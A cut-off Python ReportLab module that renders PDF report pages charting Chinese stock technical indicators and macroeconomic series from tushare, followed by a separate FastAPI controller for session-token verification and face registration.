10)\n\n    drawing = Drawing(width=width, height=height)\n\n    lp = LinePlot()\n    # lp.x = 50\n    # lp.y = 50\n    lp.height = height\n    lp.width = width\n    lp.data = data\n    lp.joinedLines = 1\n\n    # 定义各曲线颜色\n    lp.lines[0].strokeColor = colors.blue\n    lp.lines[1].strokeColor = colors.red\n    lp.lines[2].strokeColor = colors.lightgreen\n    lp.lines[3].strokeColor = colors.orange\n    lp.lines[4].strokeColor = colors.darkgreen\n\n    for i in range(0, len(data)):\n        lp.lines[i].name = data_name[i]\n        lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n        lp.lines[i].strokeWidth = 0.2\n\n    # lp.lineLabelFormat = '%2.0f'\n    # lp.strokeColor = colors.black\n\n    lp.xValueAxis.valueMin = 0\n    lp.xValueAxis.valueMax = 60*60*24\n    lp.xValueAxis.valueSteps = [n for n in range(0, 60*60*24, 60*60)]\n    lp.xValueAxis.labelTextFormat = lambda x: str(s2t(x))[0:2]\n    lp.yValueAxis.valueMin = 0\n    # lp.yValueAxis.valueMax = 50\n    # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n    drawing.add(lp)\n    add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-10)\n\n    renderPDF.draw(drawing=drawing, canvas=c, x=pos_x, y=pos_y)\n\n\ndef genLPDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25, timeAxis='day', y_min_zero=False):\n    \"\"\"\n    函数功能:生成Drawing之用\n    :return:\n    \"\"\"\n\n    drawing = Drawing(width=width, height=height)\n\n    lp = LinePlot()\n    # lp.x = 50\n    # lp.y = 50\n    lp.height = height\n    lp.width = width\n    lp.data = data\n    lp.joinedLines = 1\n\n    # 定义颜色集\n    barFillColors = [\n        colors.red, colors.green, colors.blue, colors.darkgoldenrod,\n        colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n        colors.fidred, colors.greenyellow, colors.gray, colors.white,colors.blueviolet, 
colors.lightgoldenrodyellow]\n\n for i in range(0, len(data)):\n lp.lines[i].name = data_note[i]\n lp.lines[i].symbol = makeMarker('FilledCircle', size=0.5)\n lp.lines[i].strokeWidth = 0.2\n lp.lines[i].strokeColor = barFillColors[i]\n\n # lp.lineLabelFormat = '%2.0f'\n # lp.strokeColor = colors.black\n\n x_min = data[0][0][0]\n x_max = data[0][-1][0]\n\n lp.xValueAxis.valueMin = x_min\n lp.xValueAxis.valueMax = x_max\n\n if timeAxis=='day':\n step = int(((x_max - x_min) / (60 * 60 * 24)) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x)[0:10])\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n # lp.yValueAxis.valueMax = 50\n # lp.yValueAxis.valueSteps = [1, 2, 3, 5, 6]\n\n elif timeAxis=='quarter':\n\n step = int(((x_max - x_min)/0.25) / 30) + 1\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), int(math.ceil(0.25 * step)))]\n lp.xValueAxis.labelTextFormat = lambda x: convertValue2Quarter(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='year':\n\n lp.xValueAxis.valueSteps = [n for n in range(int(x_min), int(x_max), 1)]\n lp.xValueAxis.labelTextFormat = lambda x: str(x)\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n elif timeAxis=='month':\n\n lp.xValueAxis.valueSteps = list(map(lambda x:x[0],data[0]))\n lp.xValueAxis.labelTextFormat = lambda x: str(Sec2Datetime(x))[0:7]\n lp.xValueAxis.labels.angle = 90\n lp.xValueAxis.labels.fontSize = 6\n lp.xValueAxis.labels.dy = -18\n\n if y_min_zero:\n lp.yValueAxis.valueMin = 0\n\n drawing.add(lp)\n add_legend(draw_obj=drawing, chart=lp, pos_x=10, pos_y=-20)\n\n return drawing\n\n\ndef genBarDrawing(data, data_note, width=letter[0]*0.8, height=letter[1]*0.25):\n \"\"\"\n 函数功能:生成Drawing之用\n :return:\n \"\"\"\n data_value = list(map(lambda x:x[1],data))\n\n data_finale = [tuple(data_value)]\n\n drawing = Drawing(width=width, height=height)\n\n\n bc = VerticalBarChart()\n\n # bc.x = 50\n # bc.y = 50\n # bc.height = 125\n bc.width = width\n bc.data = data_finale\n # bc.valueAxis.valueMin = 0\n bc.barSpacing = 0\n\n # bc.valueAxis.valueMax = 50\n # bc.valueAxis.valueStep = 10\n # bc.categoryAxis.style = 'stacked'\n bc.categoryAxis.labels.boxAnchor = 'ne'\n bc.categoryAxis.labels.dx = 8\n bc.categoryAxis.labels.dy = -2\n bc.categoryAxis.labels.angle = 30\n\n barFillColors = [\n colors.red, colors.green, colors.white, colors.blue, colors.yellow,\n colors.pink, colors.purple, colors.lightgreen, colors.darkblue, colors.lightyellow,\n colors.fidred, colors.greenyellow, colors.gray, colors.blueviolet, colors.lightgoldenrodyellow]\n\n for i in range(len(data_finale)):\n bc.bars[i].name = data_note[i]\n\n # 最多只支持15种颜色,多出的设置为红色\n if i < 15:\n bc.bars[i].fillColor = barFillColors[i]\n else:\n bc.bars[i].fillColor = colors.red\n\n # x_min = data[0][0]\n # x_max = data[-1][0]\n\n # bc.xValueAxis.valueMin = x_min\n # lp.xValueAxis.valueMax = x_max\n\n # step = int(((x_max - x_min) / (60 * 60 * 24)) / 15) + 1\n\n # bc.categoryAxis.categoryNames = [str(Sec2Datetime(x))[0:10] for x in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n\n drawing.add(bc)\n\n # 增加legend\n # add_legend(drawing, bc, 
pos_x=10, pos_y=-10)\n\n return drawing\n\n\ndef RPL_Bk_Page(canvas_para,bk_name):\n \"\"\"\n 函数功能:在pdf中增加bk信息,篇幅为一整页,或者更多,以页为单位\n :param bk_name:\n :param days: 用于指示近期的期限,比如近30天\n :return:\n \"\"\"\n\n\n # 插入字符串,用以表明stk代码及名称\n canvas_para.setFont(\"song\", 10)\n if bk_name in ['sh','sz','cyb']:\n stk_name = bk_name\n\n else:\n stk_name = stk_basic[stk_basic.index==bk_name]['name'].values[0]\n\n canvas_para.drawString(20, letter[1] - 10, bk_name + stk_name)\n\n\n\n sh_index = ts.get_hist_data(bk_name)\n sh_index['date'] = sh_index.index\n sh_index = sh_index.reset_index(drop=True)\n\n\n # 按时间降序排序,方便计算macd\n sh_index = sh_index.sort_values(by='date',ascending=True)\n\n # 在原始df中增加macd信息\n sh_index['MACD'],sh_index['MACDsignal'],sh_index['MACDhist'] = talib.MACD(sh_index.close,\n fastperiod=12, slowperiod=26, signalperiod=9)\n\n # 在原始数据中增加kdj信息\n sh_index['slowk'], sh_index['slowd'] = talib.STOCH(sh_index.high,\n sh_index.low,\n sh_index.close,\n fastk_period=9,\n slowk_period=3,\n slowk_matype=0,\n slowd_period=3,\n slowd_matype=0)\n\n\n # 添加rsi信息\n sh_index['RSI5'] = talib.RSI(sh_index.close, timeperiod=5)\n sh_index['RSI12'] = talib.RSI(sh_index.close, timeperiod=12)\n sh_index['RSI30'] = talib.RSI(sh_index.close, timeperiod=30)\n\n\n # 在原始数据中加入布林线\n sh_index['upper'], sh_index['middle'], sh_index['lower'] = talib.BBANDS(\n sh_index.close,\n timeperiod=20,\n # number of non-biased standard deviations from the mean\n nbdevup=2,\n nbdevdn=2,\n # Moving average type: simple moving average here\n matype=0)\n\n\n sh_index = sh_index.dropna(axis=0,how='any')\n\n close = ExtractPointFromDf_DateX(sh_index, 'date', 'close')\n m5 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma5')\n m10 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma10')\n m20 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma20')\n\n macd = ExtractPointFromDf_DateX(sh_index, 'date', 'MACD')\n\n data = [tuple(close),tuple(m5),tuple(m10),tuple(m20)]\n data_name = ['close','m5','m10','m20']\n\n drawing_ave = genLPDrawing(data=data, data_note=data_name,height=letter[1]*0.15)\n renderPDF.draw(drawing=drawing_ave, canvas=canvas_para, x=10, y=letter[1] * 0.8)\n\n drawing_macd = genBarDrawing(data=macd, data_note=['macd'])\n renderPDF.draw(drawing=drawing_macd, canvas=canvas_para, x=10, y=letter[1]*0.6)\n\n\n # 整理kdj信息\n slowk = ExtractPointFromDf_DateX(sh_index, 'date', 'slowk')\n slowd = ExtractPointFromDf_DateX(sh_index, 'date', 'slowd')\n data_kdj = [tuple(slowk),tuple(slowd)]\n data_kdj_note = ['k','d']\n\n drawing_kdj = genLPDrawing(data=data_kdj, data_note=data_kdj_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_kdj, canvas=canvas_para, x=10, y=letter[1] * 0.5)\n\n # 画图RSI信息\n RSI5 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI5')\n RSI12 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI12')\n RSI30 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI30')\n\n data_RSI = [tuple(RSI5),tuple(RSI12),tuple(RSI30)]\n data_RSI_note = ['RSI5','RSI12','RSI30']\n\n drawing_RSI = genLPDrawing(data=data_RSI, data_note=data_RSI_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_RSI, canvas=canvas_para, x=10, y=letter[1] * 0.3)\n\n\n # 画图布林线\n upper = ExtractPointFromDf_DateX(sh_index, 'date', 'upper')\n middle = ExtractPointFromDf_DateX(sh_index, 'date', 'middle')\n lower = ExtractPointFromDf_DateX(sh_index, 'date', 'lower')\n\n data_BOLL = [tuple(upper),tuple(middle),tuple(lower)]\n data_BOLL_note = ['上线','中线','下线']\n\n drawing_BOLL = genLPDrawing(data=data_BOLL, data_note=data_BOLL_note,height=letter[1]*0.1)\n 
renderPDF.draw(drawing=drawing_BOLL, canvas=canvas_para, x=10, y=letter[1] * 0.1)\n\n canvas_para.showPage()\n\n return canvas_para\n\n\ndef addMoneySupplyPage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加货币供应页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '货币供应')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n\n # 画货币供应量\n money_supply = ts.get_money_supply().replace('--',nan)\n money_supply['date'] = money_supply.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 画货币量曲线图\n m0 = ExtractPointFromDf_DateX(money_supply, 'date', 'm0')\n m1 = ExtractPointFromDf_DateX(money_supply, 'date', 'm1')\n m2 = ExtractPointFromDf_DateX(money_supply, 'date', 'm2')\n\n data_supply = [tuple(m0), tuple(m1), tuple(m2)]\n data_supply_note = ['m0', 'm1', 'm2']\n\n money_drawing = genLPDrawing(data=data_supply, data_note=data_supply_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n # 画货币量增长率曲线图\n m0_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm0_yoy')\n m1_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm1_yoy')\n m2_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm2_yoy')\n\n data_supply_yoy = [tuple(m0_yoy), tuple(m1_yoy), tuple(m2_yoy)]\n data_supply_yoy_note = ['m0增长率', 'm1增长率', 'm2增长率']\n\n money_yoy_drawing = genLPDrawing(data=data_supply_yoy, data_note=data_supply_yoy_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_yoy_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n c.showPage()\n\n return c\n\n\ndef addReserveBaseRatePage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加准备金基率\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '存款准备金基率')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n # 画银行准备金基率\n df_rbr = ts.get_rrr().replace('--', nan)\n # df_rbr['date'] = df_rbr.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 提取相关数据\n pot_before = ExtractPointFromDf_DateX(df_rbr, 'date', 'before')\n pot_now = ExtractPointFromDf_DateX(df_rbr, 'date', 'now')\n pot_changed = ExtractPointFromDf_DateX(df_rbr, 'date', 'changed')\n\n data_rbr = [tuple(pot_now)]\n data_rbr_note = ['准备金基率']\n\n money_drawing = genLPDrawing(data=data_rbr, data_note=data_rbr_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n c.showPage()\n\n return c\n\n\ndef addQuarterGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:增加季度GDP页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_quarter = ts.get_gdp_quarter()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='gdp_yoy', timeAxis='quarter')\n pi_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='pi_yoy', timeAxis='quarter')\n si_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='si_yoy', timeAxis='quarter')\n\n ti_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='ti_yoy', timeAxis='quarter')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi_yoy),tuple(si_yoy),tuple(ti_yoy)],\n data_note=['GDP同比增长率','第一产业增长率','第二产业增长率','第三产业增长率'],\n timeAxis='quarter')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addDemandsForGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:三大需求对GDP的贡献\n :param canvas_para:\n :return:\n \"\"\"\n\n c 
= canvas_para\n\n gdp_for = ts.get_gdp_for()\n\n end_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='end_for', timeAxis='year')\n asset_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_for', timeAxis='year')\n goods_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_for', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(end_for), tuple(asset_for), tuple(goods_for)], ['最终消费支出贡献率', '资本形成总额贡献率', '货物和服务净出口贡献率'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n for_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='for_rate', timeAxis='year')\n asset_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_rate', timeAxis='year')\n goods_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_rate', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(for_rate), tuple(asset_rate), tuple(goods_rate)], ['最终消费支出拉动(百分点)', '资本形成总额拉动(百分点)', '货物和服务净出口拉动(百分点)'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addGDPPullPage(canvas_para):\n\n \"\"\"\n 函数功能:展示三个产业对GDP的拉动情况\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_pull = ts.get_gdp_pull()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='gdp_yoy', timeAxis='year')\n pi = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='pi', timeAxis='year')\n si = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='si', timeAxis='year')\n industry = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='industry', timeAxis='year')\n ti = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='ti', timeAxis='year')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi),tuple(si),tuple(industry),tuple(ti)],\n data_note=['GDP同比增长率','第一产业拉动率','第二产业拉动率','工业拉动率','第三产业拉动率'],\n timeAxis='year')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addCPIPage(canvas_para, length):\n \"\"\"\n 函数功能:增加CPI页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n cpi_df = ts.get_cpi()\n cpi_df['month'] = cpi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n cpi_df = cpi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n cpi = ExtractPointFromDf_DateX(df_origin=cpi_df, date_col='month', y_col='cpi', timeAxis='month')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(cpi)],\n data_note=['CPI增长率'],\n timeAxis='month')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addPPIPage(canvas_para, length):\n \"\"\"\n 函数功能:工业品出厂价格指数\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n ppi_df = ts.get_ppi()\n ppi_df['month'] = ppi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n ppi_df = ppi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n ppiip = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppiip', timeAxis='month')\n ppi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppi', timeAxis='month')\n qm = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='qm', timeAxis='month')\n rmi = ExtractPointFromDf_DateX(df_origin=ppi_df, 
date_col='month', y_col='rmi', timeAxis='month')\n    pi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='pi', timeAxis='month')\n\n\n    ppi_industry_drawing = genLPDrawing([tuple(ppiip), tuple(ppi), tuple(qm), tuple(rmi), tuple(pi)],\n                                        data_note=['工业品出厂价格指数',\n                                                   '生产资料价格指数',\n                                                   '采掘工业价格指数',\n                                                   '原材料工业价格指数',\n                                                   '加工工业价格指数'],\n                                        timeAxis='month')\n\n    renderPDF.draw(drawing=ppi_industry_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n    cg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='cg', timeAxis='month')\n    food = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='food', timeAxis='month')\n    clothing = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='clothing', timeAxis='month')\n    roeu = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='roeu', timeAxis='month')\n    dcg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='dcg', timeAxis='month')\n\n\n    ppi_life_drawing = genLPDrawing([tuple(cg), tuple(food), tuple(clothing), tuple(roeu), tuple(dcg)],\n                                    data_note=['生活资料价格指数',\n                                               '食品类价格指数',\n                                               '衣着类价格指数',\n                                               '一般日用品价格指数',\n                                               '耐用消费品价格指数'],\n                                    timeAxis='month')\n\n    renderPDF.draw(drawing=ppi_life_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n    c.showPage()\n\n    return c\n\n\ndef addShiborPage(canvas_para,year_start='2006',year_end=str(datetime.datetime.now().year + 1)):\n    \"\"\"\n    函数功能:增加银行间拆借利率页\n    :param canvas_para:\n    :return:\n    \"\"\"\n    c = canvas_para\n\n    date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n    year_list = [str(x)[0:4] for x in date_list]\n\n    df_shibor_list = []\n    for year in year_list:\n        shibor_this = ts.shibor_data(year)\n        df_shibor_list.append(shibor_this)\n\n    df_shibor = pd.concat(df_shibor_list,axis=0).sort_values(by='date', ascending=True)\n\n    ON = ExtractPointFromDf_DateX(df_origin=df_shibor,date_col='date',y_col='ON',timeAxis='datetime')\n    W1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1W',timeAxis='datetime')\n    W2 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='2W',timeAxis='datetime')\n    M1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1M',timeAxis='datetime')\n    M3 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='3M',timeAxis='datetime')\n    M6 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='6M',timeAxis='datetime')\n    M9 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='9M',timeAxis='datetime')\n    Y1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1Y',timeAxis='datetime')\n\n    shibor_drawing = genLPDrawing([tuple(ON)],data_note=['隔夜拆放利率'],timeAxis='day',height=letter[1]*0.1)\n    renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.85)\n\n    shibor_drawing = genLPDrawing([tuple(W1)],data_note=['1周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n    renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n    shibor_drawing = genLPDrawing([tuple(W2)],data_note=['2周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n    renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.55)\n\n    shibor_drawing = genLPDrawing([tuple(M1)],data_note=['1月拆放利率'],timeAxis='day',height=letter[1]*0.1)\n    renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n    shibor_drawing = genLPDrawing([tuple(M3),\n                                   tuple(M6),\n                                   tuple(M9),\n                                   tuple(Y1)],\n\n                                  data_note=['3月拆放利率',\n                                             '6月拆放利率',\n                                             '9月拆放利率',\n                                             '1年拆放利率'],\n\n                                  timeAxis='day',height=letter[1]*0.25)\n\n    
renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.1)\n\n c.showPage()\n return c\n\n\ndef addLprPage(canvas_para,year_start='2013',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加贷款利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_Lpr_list = []\n for year in year_list:\n lpr_this = ts.lpr_data(year)\n df_Lpr_list.append(lpr_this)\n\n df_Lpr = pd.concat(df_Lpr_list, axis=0).sort_values(by='date', ascending=True).drop_duplicates(subset='1Y',keep='first')\n\n Y1 = ExtractPointFromDf_DateX(df_origin=df_Lpr, date_col='date', y_col='1Y', timeAxis='datetime')\n lpr_drawing = genLPDrawing([tuple(Y1)], data_note=['1年贷款基础利率'], timeAxis='day', height=letter[1] * 0.3, y_min_zero=True)\n renderPDF.draw(drawing=lpr_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n # 画均值贷款利率\n # df_Lpr_ma_list = []\n # for year in year_list:\n # lpr_ma_this = ts.lpr_ma_data(year)\n # df_Lpr_ma_list.append(lpr_ma_this)\n #\n # df_Lpr_ma = pd.concat(df_Lpr_ma_list, axis=0).sort_values(by='date', ascending=True)\\\n # .drop_duplicates(subset=['1Y_5', '1Y_10', '1Y_20'], keep='first')\\\n # .apply(lambda x:x.replace('---',nan), axis=1)\n #\n # Y1_5 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_5', timeAxis='datetime')\n # Y1_10 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_10', timeAxis='datetime')\n # Y1_20 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_20', timeAxis='datetime')\n #\n # lpr_ma_drawing = genLPDrawing([tuple(Y1_5),tuple(Y1_10),tuple(Y1_20)],\n # data_note=['1年贷款基础利率-M5','1年贷款基础利率-M10','1年贷款基础利率-M20'],\n # timeAxis='day',\n # height=letter[1] * 0.3)\n #\n # renderPDF.draw(drawing=lpr_ma_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n\n c.showPage()\n return c\n\n\ndef addTailPage(canvas_param, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString(20, PAGE_HEIGHT*0.7, '加群:StockReport 825832838')\n\n canvas_param.drawString(20, PAGE_HEIGHT * 0.65, '每日免费获取该文档!')\n\n canvas_param.showPage()\n\n return canvas_param","repo_name":"dxcv/My_Quant","sub_path":"Auto_Report/ReportLab/SubFunction.py","file_name":"SubFunction.py","file_ext":"py","file_size_in_byte":32173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
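The record above wires every chart the same way: build a Drawing, configure a LinePlot, add a legend, and stamp the result onto a canvas with renderPDF.draw. A minimal, self-contained sketch of that pattern follows; the sample points and the output path demo.pdf are illustrative, not taken from the repository.

# Minimal ReportLab line-plot sketch; sample data and 'demo.pdf' are assumptions.
from reportlab.graphics.shapes import Drawing
from reportlab.graphics.charts.lineplots import LinePlot
from reportlab.graphics import renderPDF
from reportlab.lib.pagesizes import letter
from reportlab.pdfgen import canvas

points = [((0, 1.0), (1, 2.5), (2, 1.8))]           # one series of (x, y) pairs
drawing = Drawing(width=letter[0] * 0.8, height=letter[1] * 0.25)
lp = LinePlot()
lp.width, lp.height = drawing.width, drawing.height
lp.data = points
lp.joinedLines = 1                                   # connect the markers
drawing.add(lp)

c = canvas.Canvas("demo.pdf", pagesize=letter)
renderPDF.draw(drawing, c, x=10, y=letter[1] * 0.5)  # place the chart on the page
c.showPage()
c.save()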
+{"seq_id":"18861051015","text":"\n\nfrom fastapi import (\n APIRouter,\n UploadFile,\n HTTPException,\n File\n)\nimport socketio\nfrom service.verification import Verification\nfrom datetime import datetime\nfrom domain.model.payload import VerifySessionPayload\n\nverification_api = APIRouter(\n prefix=\"/verification\"\n)\nVerification = Verification()\n\nsio = socketio.AsyncServer(async_mode=\"asgi\")\nsocket_app = socketio.ASGIApp(sio)\n\n@sio.event\ndef connect(sid, environ, auth):\n print('connect ', sid)\n\n@verification_api.get(\"/generate\")\nasync def generate_session():\n \"\"\"\n Generate Session Token.\n\n This will generate TTL token and store on \n\n in-memory database:\n\n * Generate Token.\n * Store Token into redis.\n \"\"\"\n\n session_token = Verification.gennerate_session_code()\n\n return {\n \"issure_at\": datetime.now(),\n \"session_token\": session_token,\n \"expire_at\": int(datetime.timestamp(datetime.utcnow()) * 1000)\n }\n\n\n@verification_api.post(\"/verify-session\")\nasync def verify_session(data: VerifySessionPayload):\n \"\"\"\n Verify Session Token.\n\n This will verify token is existed\n \n in-memory database:\n\n * Verify Token.\n \"\"\"\n token = data.session_token\n session = Verification.verify_session_code(session_code=token)\n \n if not session:\n return {\n \"status\": \"Invalid or Expired token\",\n }\n else:\n return {\n \"status\": \"Verified\",\n }\n sio.emit(f'{token}',\"Verify complete\")\n\n\n@verification_api.post(\"/verify-exist\")\nasync def verify_exist(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify is exist Face Data in DB.\n\n in-memory database:\n\n * Receive face image convert to embedding vector.\n * Check is exist face data in DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submit\")\n else:\n query = await file.read()\n res = Verification.face_recognition(query_face=query)\n return res\n \n\n\n@verification_api.post(\"/register-face\")\nasync def register_face(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify is exist Face Data in DB.\n\n in-memory database:\n\n * Receive face image convert to embedding vector.\n * Check is exist face data in DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submit\")\n else:\n query = await file.read()\n try:\n Verification.register_face(query)\n return {\n \"message\":\"face registed\"\n }\n except:\n raise HTTPException(status_code=503, detail=\"Error Register\")\n","repo_name":"pattanunNP/KlarityBackend","sub_path":"controller/verification_controller.py","file_name":"verification_controller.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
